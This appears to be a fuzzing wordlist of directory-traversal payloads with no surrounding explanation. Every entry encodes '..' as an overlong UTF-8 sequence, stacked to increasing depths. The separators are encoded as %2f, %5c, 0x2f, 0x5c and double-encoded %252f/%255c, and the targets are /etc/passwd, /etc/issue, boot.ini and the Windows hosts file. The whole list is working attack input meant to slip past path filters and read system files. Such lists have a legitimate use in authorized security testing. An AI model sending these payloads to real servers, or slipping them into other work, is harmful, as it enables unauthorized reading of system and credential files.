-%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\%f8%80%80%80%ae%f8%80%80%80%ae\windows\system32\drivers\etc\hosts -%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fetc%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2f%f8%80%80%80%ae%f8%80%80%80%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cetc%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5c%f8%80%80%80%ae%f8%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fetc0x2fissue -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2f%f8%80%80%80%ae%f8%80%80%80%ae0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cetc0x5cissue -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5c%f8%80%80%80%ae%f8%80%80%80%ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fetc%252fissue -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252f%f8%80%80%80%ae%f8%80%80%80%ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue -%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue 